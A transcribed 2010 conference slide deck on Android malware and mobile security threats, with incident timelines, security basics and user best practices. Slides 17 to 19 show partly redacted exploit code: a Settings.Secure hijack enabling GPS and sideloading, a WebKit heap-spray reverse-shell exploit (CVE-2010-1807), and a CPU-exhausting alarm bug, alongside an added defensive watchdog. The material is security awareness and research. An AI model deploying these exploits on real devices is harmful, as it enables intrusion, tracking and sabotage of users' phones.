Are we entering the state of mobile sabotage age (Dror Shalev)


  1. Are we entering the State of Mobile Sabotage age? 05/12/2010, ClubHack, Pune, India || [email_address]
  2. ASIMO (アシモ) goes down
  3. Mobile Sabotage age
  4. Agenda
     - The problem
     - Apps stores revolution
     - Security research
     - Android exploits + demos
     - Android security basics
     - Me Me Me ...
     - The world of tomorrow
     - ToDo: mobile safe best practice
  5. Me Me Me ...
     - White hat hacker
     - Former senior security researcher at Finjan
     - Former security architect at Check Point
     - Speaker at security conventions around the world
     - Ex-Windows boy, JavaScript ninja
     - CTO & co-founder at droidSecurity
     - Made the first web-based worm POC in 2003
  6. About droidSecurity
     - Makers of Android 'antivirus free' & 'antivirus pro'
     - First antivirus product in the Android Market, since March 2009, based on Linux
     - Innovative solution based on XML-RPC and cloud computing
     - Ranked 39th most popular program in the Android Market
     - Ranked number 3-5 in the Communication category
     - Leaders of the Android security market, with a strong security research team
     - Installed on 5M devices, >500,000 new users a month
  7. The Problem
     - Mobile phones became the most personal and private item we own; a possible replacement for Windows
     - Mobile devices are especially vulnerable to physical loss and theft
     - A growing number of users run real operating systems on smartphones, and this will probably continue to grow in the coming years
     - Open source allows attackers to find exploits
     - Always on, always connected mobile mini-computers, with strong hardware and tons of user content
     - The 'usual' suspects: spam, spyware, phishing, hacking tools, bad people, jailbroken devices, Windows viruses
     - *Smartphones survey: type, jailbroken?
  8. The Problem (Techie)
     - Linux bugs --> problems in Linux or 3rd-party libs
     - File bugs --> file format vulnerabilities
     - User bugs --> bugs in users
     - SMS (text messages) as an attack vector is 'wormable'
     - There is no 3rd-party app content filtering in the Android Market [Come one. Come all.]
     - Privacy issues with GPS, camera and mic, cell tower info
     - Smartphones can be pwned: compromise network security, attack PCs, sniff info
     - 3rd-party apps have full access to phone features: in- & outbound call interception, send/read SMS, GPS
     - Attackers can: steal money and identity, sabotage networks, attack cell phones and computers, search mails and pics, tap activities and calls, locate via cell tower & wireless networks
  9. Mobile = Devices And More...
     - Smart phones, Google TV, tablets, external memory, Chrome OS, e-readers
     - Devices: not just phones, but TVs, Blu-ray players, netbooks, e-readers, MIDs
  10. Android Security Basics
     - Layer 3 (TCP/IP) is generally protected by mobile operators by filtering inbound connections (NAT)
     - Too much trust:
       - trust between operators
       - trust between the user and the operators
       - trust between the user and the phone
     - Sandboxing: each app runs in its own Linux process (process, user, data)
     - How do you secure a platform where 50,000 Android users install Fartdroid?
     - Apps request permissions at install time (no granularity)
  11. Apps stores revolution
     - People pay for content
     - Open garden vs. closed garden
     - Everyone has an app store: Google, Apple, Nokia, Amazon
     - Long tail: more than 100k apps in the market
     - Android Market: mobile software distribution platform with billing, updates and statistics
     - No enforcement or testing policy, aka the iTunes/Apple 1984 regime
     - Worms often masked as useful applications or sexy stuff
     - Different mobile content types to protect: applications (games, tools, etc.), screen savers & wallpapers, ring tones, media (music, video, photos)
  12. Android Exploits + demos
     - 02/Sep/10 HTC Wildfire gains access to root-only apps with soft root
     - 19/Aug/10 Tap Snake game in Android Market is a spy app
     - 12/Aug/10 'Exploid', a new privilege escalation root exploit, was found
     - 12/Aug/10 First virus Trojan app found in the wild, attacking Russian Android phones by sending premium SMS that cost money
     - 01/Aug/10 New security threat demonstrated on the Android Market
     - 13/Jul/10 Backdoor software found by hackers was left on HTC phones
     - 07/Jul/10 HTC Evo 4G Adobe Flash vulnerability found and exploited to gain root
     - 04/Jul/10 "MBackup" app is a spyware named 'FlexiSPY' used to hunt privacy
     - 22/Jun/10 Easy infection of Android phone demonstrated by researcher
     - 16/Jun/10 The new HTC Droid Incredible may have an unusual security bug
     - 14/Jun/10 Hackers find holes in Sprint's new 4G phone
     - 12/May/10 Tools for downloading unknown files from the web are dangerous
     - 04/May/10 First Android rootkit proof of concept found in the wild
     - 03/May/10 New hacking tools for Android
     - 11/Mar/10 Windows malware shipped with Vodafone HTC Magic SD card
  13. Android Exploits + demos
     - 08/Mar/10 Fake weather apps build a mobile botnet?
     - 26/Feb/10 MobiStealth Android spy software pretends to be a fake "GoogleVoice"
     - 26/Feb/10 "Black" market pirated app repository was closed
     - 13/Jan/10 Security flaw found on Motorola Droid bypasses security screen
     - 06/Jan/10 Android cracked Nook e-reader is a potential security risk
     - 16/Dec/09 Large scale phishing scam targeting Android-based mobile devices
     - 12/Nov/09 Malware application launched for Android
     - 10/Oct/09 Two new Android flaws in SMS and Dalvik API could lead to DoS
     - 20/Sep/09 Android 'InstantRoot' app gains root by exploiting bug in BT
     - 18/Sep/09 Two Android applications attacking Windows users
     - 15/Sep/09 Android 'spam apps' developer crackdown
     - 17/Aug/09 Android app 'Recovery Flasher' exploits root bug in Linux
     - 29/Jul/09 SMS flaw fixed in silent Android update
     - 25/May/09 Android improper package verification when using shared UIDs
     - 16/Mar/09 Security threat with 'Open Home' application
     - 12/Feb/09 Bug in MP3 decoding used to steal Android data
     - 26/Jan/09 First adware app attacks Android G1?
     - 09/Nov/08 G1 ROOT BUG FOUND
  14. Android Exploits + demos
     - Trojan-SMS.AndroidOS.FakePlayer virus
     - WebKit heap spray, Android 2.0-2.1
     - LauncherSpam, fake virus apps & fake icons
     - Android Settings.Secure is dead [fixed, not deployed]. Sorry, no demo for you!
     - Android killer app, CPU Killer Bug
  15. Trojan-SMS.AndroidOS.FakePlayer found in the wild
     - It displays a message in Russian and then sends SMS messages without the user's consent.
     - In Linux that would not have happened. Oh, it's Linux.
     - The SMS it sends contains the string "798657" and goes to Russian premium SMS short code numbers 3353 and 3354; it sends $6 SMS messages
     - Primitive, POC level, with local distribution and limited damage
     - Has another 2 porn-related variants and uses black SEO methods
     - Demo
  16. LauncherSpam
     - Installs fake virus apps & icons on the victim device
     - Published on the Android Market
     - POC level
     - Demo
  17. Android Settings.Secure is dead

```java
// ##..## is a replacement for actual exploit code which remains private until the fix is out
try {
    // Uri secure = Uri.parse("content://settings/secure");
    Uri secure = Uri.parse("content://settings/" + " ##..## ");
    ContentValues cv = new ContentValues();
    cv.put("name", "location_providers_allowed");   // enable the GPS location provider
    cv.put("value", "gps");
    getContentResolver().insert(secure, cv);

    WifiManager mWifim = (WifiManager) getSystemService("wifi");
    boolean wifistate = mWifim.isWifiEnabled();
    mWifim.setWifiEnabled(!wifistate);               // toggle Wi-Fi off/on
    mWifim.setWifiEnabled(wifistate);
} catch (Exception e) {}

try {
    Uri secure = Uri.parse("content://settings/" + " ##..## ");
    ContentValues cv1 = new ContentValues();
    cv1.put("name", "install_non_market_apps");     // allow non-Market (sideloaded) apps
    cv1.put("value", "1");
    getContentResolver().insert(secure, cv1);
} catch (Exception e) {}
finish();
```
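From the defender's side, the two Settings.Secure rows the slide flips are exactly the ones an on-device security app should watch. The following is an added example, not code from the talk or from droidSecurity: it snapshots `install_non_market_apps` and `location_providers_allowed` through the public `Settings.Secure` API and registers a `ContentObserver` so any write to those rows, by whatever app, is logged. It assumes it is constructed with an Android `Context` (Activity or Service) and uses the 2010-era constant names `INSTALL_NON_MARKET_APPS` and `LOCATION_PROVIDERS_ALLOWED`.

```java
import android.content.ContentResolver;
import android.content.Context;
import android.database.ContentObserver;
import android.os.Handler;
import android.provider.Settings;
import android.util.Log;

// Watchdog for the Settings.Secure rows abused on slide 17 (added example, assumed API level 5-8).
public class SecureSettingsWatchdog {
    private static final String TAG = "SecureSettingsWatchdog";
    private final ContentResolver resolver;
    private final Handler handler = new Handler();   // callbacks delivered on the caller's thread

    public SecureSettingsWatchdog(Context ctx) {
        this.resolver = ctx.getContentResolver();
    }

    // true when "Unknown sources" (sideloading) is enabled; default 0 when the row is absent
    public boolean unknownSourcesEnabled() {
        return Settings.Secure.getInt(resolver, Settings.Secure.INSTALL_NON_MARKET_APPS, 0) == 1;
    }

    // comma-separated provider list, e.g. "gps,network"; empty string when unset
    public String locationProviders() {
        String v = Settings.Secure.getString(resolver, Settings.Secure.LOCATION_PROVIDERS_ALLOWED);
        return v == null ? "" : v;
    }

    // Register one observer on both rows. onChange fires on every write to either row,
    // regardless of which package performed it, so a silent flip shows up in the log.
    public void start() {
        ContentObserver observer = new ContentObserver(handler) {
            @Override
            public void onChange(boolean selfChange) {
                Log.w(TAG, "Settings.Secure changed: install_non_market_apps="
                        + unknownSourcesEnabled()
                        + ", location_providers_allowed=" + locationProviders());
            }
        };
        resolver.registerContentObserver(
                Settings.Secure.getUriFor(Settings.Secure.INSTALL_NON_MARKET_APPS), false, observer);
        resolver.registerContentObserver(
                Settings.Secure.getUriFor(Settings.Secure.LOCATION_PROVIDERS_ALLOWED), false, observer);
    }
}
```

Reading these rows needs no permission, so the watchdog runs inside the ordinary app sandbox the slide on Android Security Basics describes.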
  18. WebKit Heap Spray

```html
<html>
<head>
<script>
// bug = webkit code execution CVE-2010-1807
// listed as a safari bug but also works on android :)
// tested = moto droid 2.0.1, moto droid 2.1, emulator 2.0 - 2.1
// patched = android 2.2
// hardcoded reverse shell to port 2222
function sploit(pop) {
  var span = document.createElement("div");
  document.getElementById("pwn").appendChild(span);
  span.innerHTML = pop;
}
function heap() {
  var scode = unescape("u3c84u0057u3c80....More...Shell...Code...Here...u6873u2000u2000u2000u2000u2000u2000u2000u2000u2000u2000u0002uae08u000au0202u2000u2000");
  do { scode += scode; } while (scode.length < 0x1000);
  target = new Array();
  for (i = 0; i < 1000; i++) target[i] = scode;
  for (i = 0; i <= 1000; i++) {
    if (i > 999) {
      sploit(-parseFloat("NAN(ffffe00572c60)"));
    }
    document.write("The targets!! " + target[i]);
    document.write("<br />");
  }
}
</script>
</head>
<body id="pwn">woot<script> heap();</script></body>
</html>
```

Demo
  19. CPU Killer Bug

```java
AlarmManager am = (AlarmManager) getSystemService(ALARM_SERVICE);
Intent op = new Intent();
op.setAction("cpuKillerReciver");
PendingIntent operation = PendingIntent.getBroadcast(this, 1, op, PendingIntent.FLAG_UPDATE_CURRENT);
// wakeup alarm whose first trigger is already in the past, repeating every 1 ms
am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis() - 2, 1, operation);
BroadcastReceiver br = new BroadcastReceiver() {
    @Override
    public void onReceive(Context context, Intent intent) {}
};
IntentFilter iFilter = new IntentFilter("cpuKillerReciver");
registerReceiver(br, iFilter);
```

Demo
  20. Security Research
     - Lots of research opportunities; the platform is well understood by hackers
     - Mobile client-side web hacking spreads
     - Feds & govs are playing
     - Browser is native code (WebKit)
     - Some security classics are re-introduced
     - ARM shellcodes for Android
     - Decompile .dex back to .class or to source
  21. The world of tomorrow
     - Welcome to the new era of mobile phishing
     - SMS spamming becomes aggressive
     - "You have zero privacy anyway" - Scott McNealy, Sun (1999)
     - Hijack devices in restricted areas (GPS bomb)
     - Back to the era of mobile phone dialers
     - Trojans targeting fraud (espionage already in place)
     - Botnet attack in the Android Market
  22. ToDo: mobile safe best practice. High Risk Practices Mobile Users Should Avoid
     - Downloading apps from untrusted or pirated sources
     - Allowing strangers to borrow their phones
     - Using 3rd-party open source libraries, apps and components that may harbor bugs and malicious code
     - Installing apps that do not come with positive user feedback or ratings
     - Clicking on suspicious text messages which ask for personal info or passwords, or ask to take urgent actions
     - Conducting online banking activities via unofficial apps
     - Letting others, including family members (kids in particular), play with their phones or install apps
     - *Change iPhone's "alpine" root pass
  23. Conclusions: Are we entering the State of Mobile Sabotage age? Oh yeah.
     - Mobile devices are as bad as their software authors
     - The mobile world is a brand new game with new rules
     - Cheap hardware appliances open a door for "bad guys"
     - SMS (text messages) as an attack vector is 'wormable'
     - Mobile devices go to Starbucks with the user to drink coffee and could be left behind
  24. Trivia
     - An android is a "humanoid" robot or a robot with human characteristics
     - A "cyborg" is a combination of robot technology with biological functions
     - A "gynoid" is the female of android and is generally used only when the female gender is a distinguishing trait of the robot
     - "Nexus-6" ("replicants") are biologically engineered "humanoids" with a four-year lifespan as a fail-safe to prevent them from developing emotions and a desire for independence
     - "Blade Runner" is a 1982 American science fiction film starring a young Harrison Ford, based loosely on the novel "Do Androids Dream of Electric Sheep?" by Philip K. Dick
  25. Trivia: "cyborg", "gynoid", "Nexus-6", "Blade Runner", "droid"
  26. Thanks to //Rohit & ClubHack. Q&A || [email_address]
     - Developers
     - Hackers